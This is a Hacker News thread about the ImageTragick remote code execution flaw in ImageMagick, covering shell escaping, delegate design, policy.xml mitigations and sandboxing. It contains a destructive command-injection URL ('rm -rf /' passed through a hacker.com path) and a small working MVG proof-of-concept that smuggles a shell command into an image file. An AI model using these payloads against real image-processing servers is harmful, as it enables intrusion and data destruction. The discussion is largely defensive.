Remote code execution vulnerability in ImageMagick
imagetragick.com
imagetragick.com
If so then it's not complicated file formats or buffer overflows, it's an improperly escaped 'system' call being fed user input in an obscure feature that probably shouldn't have been included in the first place. Party like it's 1999 guys.
Edit: I'm pretty sure this is an RCE issue. This function[4] replaces the placeholders in the wget command, which is this: `wget -q -O "%o" "https:%M"`
So seeing as %M is user controlled we can feed it a URL like "//hacker.com/`rm -rf /`" and it will blindly pass it to the shell. Wow.
1. https://github.com/ImageMagick/ImageMagick/commit/a347456a1e...
2. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44...
3. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44...
4. https://github.com/ImageMagick/ImageMagick/blob/32bdefdc31f1...
Shouldn't this type of utility rather be a library if it's to be used from other applications such as web apps?
As for the wisdom of this approach...
You could feasibly do the same stuff in an interpreted language, but (I suspect) it would be substantially slower than directly running those compiled command-line tools underlying it.
That sounds bass ackwards if you ask me. A command line tool is usually a thin wrapper around a library, for a reason.
I realize it might seem crazy to duplicate functionality from gs into your library, but then the tool should link against those code bases as libraries instead of calling some gs executable (which of course in turn is just a wrapper around a gs library and so on).
Making a library call to re-scale an image or convert from formatA to formatB shouldn't be a shell execute call to begin with, and it shouldn't be making any shell exec calls of its own.
It's historically grown. The tool came first, the library was tacked on later.
And yes, it's a mess. That's why the much saner GraphicsMagick was forked off it… in 2002. People just never migrated.
That being said, I wouldn't be surprised if porting those things over from compiled languages to be a part of the library would prove to be substantially slower. For high-volume applications, it would very possibly make the library totally unusable.
I agree that it's a backwards way of doing things in a perfect world, but the perfect is the enemy of the good. Sometimes you've gotta make compromises for reality's sake.
I must have missed something, I thought ImageMagick was a collection of C libraries and C programs, which in turn occasionally called other libraries and programs (such as gs).
What I meant was that a graphics utility should be a c library that exports functions like
scale_image(source_image, target_image, scale)
to be used instead of running a command line utility convert image.jpg -resize 0.5
That can't ever be slower, but some times likely faster (e.g. to recode an image before inserting as a blob into a db or sending over a netwoek you wouldn't even write it to disk).I have never heard of a program where the command line program is at the heart, and a library is wrapped around it. I can't even imagine how such code would be structured.
http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservation-s... http://libpipeline.nongnu.org/
I expect there may also be option injection vulnerabilities in the code.
http://www.defensecode.com/public/DefenseCode_Unix_WildCards...
Edit: Actually it already does: https://github.com/ImageMagick/ImageMagick/blob/master/Magic...
* https://msdn.microsoft.com/en-gb/library/windows/desktop/ms6...
A single command tail is the Win32 model at base, as it was the DOS API model before it. (The OS/2 model was multiple command tails, although in practice most programs read no more than just one.) exec*() implementations are layered on top of this, and the argv[] notion is a shared fiction maintained by the runtime libraries of C and C++ implementations.
This one [1] seems to deal with ImageMagick's feature that reads the contents of a file into the command line: "The special character '@' at the start of a filename, means replace the filename, with contents of the given file. That is you can read a file containing a list of files!" Again though, that's a filename-based problem, not something you'd use magic number checking to defend against.
Edit: I guess with the "@filename"-based one, you could defend on the basis that the payload will be a text file of filenames, but that seems rickety at best.
1: https://github.com/ImageMagick/ImageMagick/commit/58a2ce1638...
In particular, ImageMagick accepting MSL directly into convert seems like an extremely straightforward exploit path, so much so that it actually seems unlikely. Their documentation makes it seem like it's designed to use a separate command "conjure," but... some combination of factors is at play here, anyway.
s/'/'\''/g
s/^/'/
s/$/'/
> Enclosing characters in single quotes preserves the literal meaning of all the characters (except single quotes, making it impossible to put single-quotes in a single-quoted string).
Note also the following examples, with double-quoted strings:
$ echo a b c
a b c
$ echo "a" "b" "c"
a b c
$ echo "a""b""c"
abc
$ echo "a" b "c"
a b c
$ echo "a"b"c"
abc
The same concatenation rules apply to single-quoted strings. So, by putting single quotes at the beginning and end of a string, you only need to worry about single quotes within the string. You can "escape" those with '\'', where the first single quote terminates the preceding single-quoted string, the backslash+single-quote pair is a literal unquoted/escaped single quote in the shell, and the final single quote begins single-quoting again for the rest of the string. The three parts are then dequoted and concatenated together back into your original string by the shell. $ echo 'hi\'
hi\In the meantime, maybe a DONT_RUN_COMMANDS ifdef around every call to fork/system/exec is merited...
If you are looking for a small, standalone, non-copyleft alternative, the closest I can think of is the [exec] command in the Jim Tcl [1] embedded scripting language.
Here is an example (without the error checks you'd have in production code):
#include "jim.h"
int main(int argc, char const *argv[])
{
Jim_Interp *interp;
int error;
Jim_Obj *cmd;
interp = Jim_CreateInterp();
Jim_RegisterCoreCommands(interp);
Jim_InitStaticExtensions(interp);
// The input redirect below does *not* invoke the POSIX shell. It is handled by Jim Tcl itself.
cmd = Jim_NewListObj(interp, NULL, 0);
Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "exec", -1));
Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "awk", -1));
Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "1", -1));
Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "<", -1));
Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "/etc/passwd", -1));
error = Jim_EvalObj(interp, cmd);
if (error != JIM_ERR) {
printf("%s\n", Jim_String(Jim_GetResult(interp)));
}
Jim_FreeInterp(interp);
return error;
}
While I am a fan of the language and of the "hard and soft layers" approach in general [2], it is a commitment: it requires you to embed the language runtime in your program and learn the basics of the scripting language itself and its C API. The upside is that Jim Tcl's [exec] works on Windows, too (and you get other goodies with Jim like a fast, high quality implementation of strings and hash maps).Alternatively, you can use the "big" Tcl [3] as a C library. It's larger but more mature and is available in every major Linux distribution.
[1] http://jim.tcl.tk/fossil/doc/trunk/Tcl_shipped.html#_exec
Either way you get a very fine C library that prevents you from succumbing to Greenspun's tenth rule, so I can only recommend it for most C programs and libraries of sufficient size and complexity.
I agree with you on writing in another language but presumably you wouldn't be considering libpipeline anyway unless you had to write C. My default approach when I need C to access some API is to write an extension to an interpreter from which to access it. I leave embedding an interpreter in C for when you can't do that.
viewbox 0 0 1 1 image over 0,0 0,0 'https://test/" && touch /tmp/hacked && echo "1'
$ sudo convert file.mvg o.png
convert.im6: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1065.
convert.im6: unable to open image `/tmp/magick-Yjc5q9f1': No such file or directory @ > error/blob.c/OpenBlob/2638.
convert.im6: unable to open file `/tmp/magick-Yjc5q9f1': No such file or directory @ error/constitute.c/ReadImage/583.The policy.xml workaround mentioned here seems to stop it https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
https://github.com/thoughtbot/paperclip/issues/2190#issuecom...
But the link submitted to hackernews specifically mentioned "magic bytes" which is the file type problem. I think Paperclip is not affected on that one.
Also, I am surprised how few people have switched from ImageMagick to graphocksMagic, given that the fork happened back in 2002 and that it offers significant improvements.
It was better for a period after the fork, but the only guy working on it hasn't maintained it that well...there's a significant number of bugs in GraphicsMagick that have been there for years.
If security is really important to you though, you should move image processing to separate isolated servers anyway, and verify magic bytes as described by this site.
I was checking magic numbers before sending files to GraphicsMagick but I'm going to go through my code again and make sure that this is always happening.
The Graphicsmagick code base includes 3 of the 5 coders that are mentioned (URL, MVG and MSL). 2 of those use LibXML and url.c suspiciously uses LibXML's nanoftp and nanohttp.
Under Unix, all text (non-numeric) substitutions should be
surrounded with double quotes for the purpose of security, and
because any double quotes occuring within the substituted text will
be escaped using a backslash.
Commands (excluding file names) containing one or more of the
special characters ";&|><" (requiring that multiple processes be
executed) are executed via the Unix shell with text substitutions
carefully excaped to avoid possible compromise. Otherwise, commands
are executed directly without use of the Unix shell.
I assume GraphicsMagick doesn't suffer from this vulnerability.Wasn't Flickr the biggest site using GraphicsMagick?
edit: PoC here https://news.ycombinator.com/item?id=11624056 though I haven't ran it myself.
[EDIT: Actually, 8 of the commits top of tree as of writing are "...". wow.]
On top of that, "Second effort to sanitize input string" at [1] appears related to this issue, and doesn't have a single test change, even on the second attempt!
[1]: https://github.com/ImageMagick/ImageMagick/commit/a347456a1e...
Maybe github is just a mirror
(edits - nope, looks like they changed recently. perhaps it's a reflection of developers moving from svn to git)
While I was at it, 49 commits using "..." as the message, and 8520 commits with absolutely no message at all.
seems to be the default on heroku already:
Path: /etc/ImageMagick/policy.xml
Policy: Coder
rights: None
pattern: EPHEMERAL
Policy: Coder
rights: None
pattern: URL
Policy: Coder
rights: None
pattern: HTTPS
Policy: Coder
rights: None
pattern: MVG
Policy: Coder
rights: None
pattern: MSLIs there a tool I can use to verify that my website is protected?
I'm completely unsurprised about these bugs given the number of serious problems I ran into. Granted, that was something like 17 years ago, but these veteran projects have a tendency to hang around on life support for decades. Projects that are huge messes don't generally get cleaned up without massive outside pressure (see: openssl).
It's an SEO thing. Searching "resize image" would almost always lead to ImageMagick examples that would work well enough to not require looking elsewhere. Almost every time I've used it, it's been for a few simple image operations (downsize, rotate, etc) that happen once on a user upload of a tiny site so performance wasn't a concern.
But both have plugins/modules that you can use to switch the library to ImageMagick very easily, and some plugins/modules would require ImageMagick for specific functionality.
I work at a hosting company, really hoping this PoC is more complex than is implied in the post. So few people actually patch/update their boxes with any degree of regularity.
No skin off anybody's nose if they have to block MVGs, but SVG could be somewhat of a loss.
If anyone has a solution for disabling xlink'd images but retaining the rest of MSVG functionality, we'd be all ears.
But, it doesn't resolve the problem that the internal renderer can be used to read local files and include their contents in the rendered image through the xlink:href. It's not clear to me that there's any way to disable that. The ImageMagick forum post gives an additional policy entry to "prevent indirect reads" but it doesn't seem to have that effect (unless it also requires an updated ImageMagick).
Edit: It... maybe... looks like the "indirect reads" mitigation was very narrowly targeted at the CVE-2016-3717 PoC using "label:@" but that's far from the only way to do local reads once you've got ImageMagick parsing "URLs" inside your input file (hint: there's a txt: coder). I'm honestly not totally sure what that policy is intended to do...
Edit 2: Well, it appears that the "prevent indirect reads" policy does indeed require an updated ImageMagick: "Denying indirect reads with a path policy and a pattern of "@*" is supported in ImageMagick 6.9.3-10 and ImageMagick 7.0.1-1 for those that need to utilize the MVG and MSL coders." I haven't used that version but I still think, judging from what it looks like, that it won't really solve the problem.
Probably not a bad thing to be doing anyway.
Edit: Or any other libmagickwand based project for that matter.
http://www.imagemagick.org/script/magick-wand.php
MagickWandGenesis(); contrast_wand=NewMagickWand(); status=MagickReadImage(contrast_wand,argv[1]);
Tell me please, that this is a sane API, but then please provide me your github account as well, just to know what to avoid at all costs in the future
Edit: USE LIBGD: http://libgd.github.io/ it has friendly API, suggesting sane developers, and the API is easy to use from wrappers (I used with P/Invoke interop from C# without any hickups). It looks to me that it was designed in a way to be easily usable that way, which suggests design, not just growing code like cancer.
The new bounty will be for proofs of input parser correctness, not exploits.
Also - would an example of using a HTTPS coder be:
convert https://example.com/rose.jpg ~/rose.png
Using policy.xml to disable EPHEMERAL, URL, HTTPS, MVG and MSL is a nice start, but is it also possible to disable PDF, open office, FTP and others? Where would I find a list of all the supported coders?
I'm not clear on the difference between a "coder" and a "delegate". Do I need to add a policy.xml entry to for each delegate?
https://blog.sucuri.net/2016/05/imagemagick-remote-command-e...
But when you have magic in the software's name you could do better then ImageTragic.
... though none come to me right now
Magick: The Pwning
Well. What did you expected?
http://breachattack.com/ (an attack against https, ironically not even bothering to serve over https)
We are told that Rust will save us. Glib answer - if it was going to, it already would have (and this is from someone already writing Rust code).
I hope it will lead to a change on two fronts:
1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.
How is creating new image formats and getting the entire Web to adopt them easier than making more secure image decoders?
It's especially irrelevant to this series of vulnerabilities, since they work by getting ImageMagick to parse less popular image formats. Inventing new ones won't do anything to mitigate these flaws.
> if it was going to, it already would have (and this is from someone already writing Rust code).
I don't understand what this is trying to imply.
We had better options before and after C, yet here we are. Not to piss on Rust's parade, but it may prove not to be the white knight of code hoped for. And I like Rust - I am probably just less emotionally clouded in my view point.
I don't really agree with the rest. "Simple file formats" is a theoretically nice idea which is impractical – after all, features are added to file formats for a reason. "Restrictive not permissive" is, as others have pointed out, a divergence from the generally useful Postel's law. Writing a library which cannot handle common problems in file formats – of which there are a huge number, due to sloppy implementation – is a good way to ensure you have developed a library which will be used by few.
There have been all sorts of safe languages that are appropriate for image processing and other types of programs, but people apparently like programming in C more than they like secure software. It is hard to see how something like Common-Lisp/Ocaml/Haskell/Java/Eiffel/C#/Ada wouldn't be more than up to the task, with only a slight speed penalty. It seems more like a social issue than a technical one. Maybe Rust will finally be able to break through, but I wouldn't hold your breath.
.foo {
someprop: boring-old-value;
someprop: awesome-new-value;
}
instead of old browsers that don't understand just throwing a fit and dying, they ignore stuff they don't understand and carry on. So we know that a browser which doesn't implement 'someprop: awesome-new-value' will go ahead and read 'someprop: boring-old-value' instead of stopping processing of the CSS, or worse, emitting an error and refusing to render the page altogether. Without this, it would effectively be impossible to ship new web features until old browsers had died off to <epsilon-of-users-we-don't-care-about>.Getting underneath the patterns and anti-patterns of permissiveness in an informed way is a lot more useful IMO than the knee-jerk reaction of declaring all permissiveness harmful and running away. Especially in light of the web's incredible wins via this strategy.
But these are pretty damn twisted priorities. A little bit of social responsibility wouldn't hurt.
Not following Postel's law would result in brittle system components that break when other parts of the system evolve.
This depends how much graceful degradation you have available to you. In systems/domains where little is available, following Postel's law can result in silent failures rather than explicit/loud ones. The question isn't whether they break or how brittle they are, but whether you will notice whether they did break. Each system exists within a range on a continuum of how acceptable Postel's law is.
Being liberal in what you accept is precisely the definition of brittle: if there's an update that reduces the set of representable input data, but you keep the code that processes the user's input into data, then an untested, little-used edge case could invalidate your assumptions about the rest of the system.
However, this MIME type was extremely rare because MSIE would not show a web page unless the MIME type was text/html.
Furthermore, the extreme brittleness of XHTML was generally regarded as a Bad Move as one single URL in your source code with a literal ampersand instead of & would cause a complete and total breakage of your web page. Of course, many web pages are crummily concatenated strings and there are a lot of web devs who would never be able to reliably generate 100% XHTML-compliant output. Shit, pasting in a snippet of HTML where the BR tags omitted the self-closing slash would break your XHTML validation.
tl;dr: Yes, and it sucked
Basically, give people a hand, and they'll grab your whole arm. It's human nature, and Web developers aren't above it.
Of course. If you served XHTML properly (by setting "application/xhtml+xml" MIME type), ill-formed XHTML would just show you a big syntax error instead of the page. Try it, that's still the case.
Even when being well-formed, lots of sites still used "text/html" type to trigger HTML (SGML) parser instead of XML one, as any 3rd party code embedded into the website would of course crash the page as well.
That was one of the reasons why XHTML never got popular and eventually has been abandoned.
https://tools.ietf.org/html/rfc793
2.10. Robustness Principle
TCP implementations will follow a general principle of robustness: be
conservative in what you do, be liberal in what you accept from
others.What's the current market share for IE? 30% 40%? That seems pretty good for a browser which for years was a broken malware propagating mess.
How are you going to enforce this for everyone?
> TCP implementations will follow a general principle of robustness (...)
This rule has worked well for TCP implementors in large part because of their circumstances, which are very different from those of browser implementors and Web developers:
(0) Priorities: How much do the following desiderata matter to each group: reliability, performance, new features?
(1) Skill: What skills does a representative programmer from each group have?
(2) Risk profile: How does each group cope with the possibility of design and implementation errors? How much technical debt are they willing to take?
I'd contend that Postel's law doesn't scale beyond relatively small groups of highly skilled programmers, for whom reliability is paramount and trumps all other considerations.
Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.
Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.
C++ is still a lot more permissive than it could and should be.
> Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.
Same here. The idea that JavaScript ought to be permissive and forgiving because its target audience doesn't know what they're doing turned out to be a self-fulfilling prophecy on the part of its designers.
Also, there's no need to crash the tab. The browser could simply stop running any JavaScript, and leave the user with a static page.
Imagine that you've built the ImageMagick library into a unikernel server using a virtio serial port for I/O. When you need to process an image, you boot a VM with this imagemagick kernel, then pipe the image data through its virtual serial port. Data goes in, data comes out...
And if the attacker manages remote code execution inside the VM, who cares? There's nothing in there. There's no network stack, there's no access to storage, there's no access to other processes; all you give this VM is the RAM and serial port the unikernel needs to do its job.
Like, there's no magic to a unikernel. It's just a process in a jail, unless you're legitimately running it directly on the cpu. Adding more layers of abstraction does not inherently add security.
Sure, it's just a different kind of jail, but I'd rather start with a jail that is empty by default and add selected features to it when I'm convinced they're safe, than start with an ordinary apartment and remove things from it until I think it's secure enough to function as a jail cell.
There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.
Also, there are still myriad ways this kind of interface can represent an attack surface if you aren't sufficiently careful with the communication protocol (that presumably you are writing).
> There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.
And that assumes your unikernel environment has no subtle tricks to escape the jail.
I think the reason people don't do this is because it's extremely platform-specific. Most of this C code runs on Windows too (ImageMagick, ffmpeg, etc.)
And it's complicated. But if there were a nice library to do all this stuff, I think people would use it.
If you're just shelling out to command line tools like ImageMagick, you don't even have to change any C code... you can just run it under a wrapper (sorta like systemd-nspawn). But I think most people are not using ImageMagick that way -- they are using a Python/Ruby binding, etc.
But it can still be done -- it just takes a little effort. MUCH less effort than changing any of that old crufty code, much less rewriting it in Rust!
[1] Some thoughts on security after 10 years of qmail -- https://scholar.google.com/scholar?cluster=98145703154405707...
Of course, chaining multiple commands together is a pain, and that's what the shell is good at, but then it is hard to get the quoting right. So a more structured shell interface. There's libpipeline, but I haven't used it to comment on.
The rest of the application will need to run with privileges to actually do the stuff you care about, like display things to your screen and so forth.
Right, but the reason for this bug (and many others) is the mingling of the data bytestream and the command channel (the arguments for the call to wget).
> The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.
I don't think that would help. Your sandboxed deserializer deserializes the video file into an inert datastructure. But then you go to system() to wget based on that datastructure and you're pouring commands and data into a flat stream. That architecture won't stop you from parsing a bunch of unix commands as image bytes and then passing those "image bytes" on the command line.
You mean when DJB denied Qmail has bugs?
http://www.dt.e-technik.tu-dortmund.de/~ma/qmail-bugs.html
Unfortunately, 404 at the moment, but Internet Archive has a copy:
https://web.archive.org/web/20160409054053/http://www.dt.e-t...
You know why this MTA has that low count of published bugs? Because nobody uses it anymore, so nobody looks at its code (and now factor in the ugliness of the code itself, which lowers the eagerness to look at the code even more). It's not because the code is (magically?) better.
Actually, the magic byte thing makes me think this is a content sniffing issue, and the RCE might be due to a "feature". Rust won't help or, at best, would make it more awkward to exploit.
A capability-based (i.e. memory-safe, no accessible globals that can induce side effects) system would mitigate this, though. If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.
Check out OpenBSD's pledge, it's addressing precisely this problem.
Au contraire.
You can fork(), restrict yourself to a couple of pipes in a subprocess, pledge(), do the calculation in the subprocess, and exit the subprocess. It'll work, and it'll be slow. But this isn't at all specific to pledge() -- seccomp can do exactly the same thing, arguably more simply. Performance will suck either way.
<rant>I have yet to see a credible argument for how pledge() is better than seccomp. You could almost implement pledge() as a library function that uses seccomp, and the I consider the one part of pledge (execve behavior) that this won't get right to be a misfeature in pledge<./rant>
The performance of that scheme will be abysmal for anything that does very fine-grained sandboxing. What you want is language support. E (erights.org) does this as a matter of course. Rust and similar languages could if they were to allow subsetting of globally accessible objects. Java and .NET tried to do this and fell utterly flat.
I've considered trying to get a nice Linux feature to do this kind of sandboxing with kernel help (call a function that can only write to a certain memory aperture without the overhead of forking every time), and maybe I'll get this working some day.
You'd set the library's code and data pages to protection key 1, along with the page containing a library access trampoline, leaving the rest of the address space with protection key 0. You'd call into the library through the trampoline, which would revoke access to protection key 0, call into the library, then restore access to key 0.
Impossible in the world where programmers routinely cram together networking and file transformations without any regard for whether the operation belongs there or not (build systems that on `compile' command download random things from internets; even Rust's build system does such a dumb thing by downloading rustc after running an hour-long LLVM compilation, instead of failing before doing anything).
Is it not just improper shell escaping? You could do that incorrectly in any language. If you're not quoting | and ` and stuff correctly when you call system() you're doomed no matter the language.
* http://cr.yp.to/qmail/guarantee.html
* http://cr.yp.to/qmail/qmailsec-20071101.pdf
The GNKSOA-MUA comes to mind, too. The other vulnerabilities (there being five -- see the mailing list message) are related to the idea of allowing input data files to contain embedded actions and commands to be executed by the data processing tool. In the world of mail there were many variations on this theme. Clifton T. Sharp Jr's Usenet signature was "Here, Outlook Express, run this program." "Okay, stranger.".
* http://homepage.ntlworld.com./jonathan.deboynepollard/Propos...
> 2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.
The best talk on computer security I have seen is Meredith Patterson's Science of Insecurity at 28c3: https://www.youtube.com/watch?v=3kEfedtQVOY
It is really interesting that the techniques needed to achieve these security goals (theory of grammars) is one of the oldest and best explored areas of computer science.
http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservation-s... http://www.defensecode.com/public/DefenseCode_Unix_WildCards...
2. is breaking the internet
I'm not sure I'm ready to accept the collateral damage of your solutions.
How about looking at "C" (or any other language with direct memory access) as the culprit? (EDIT: Assuming it's a C-issue after all and not just some dumb input validation problem.)
Use ImageMagick. http://www.imagemagick.org/script/identify.php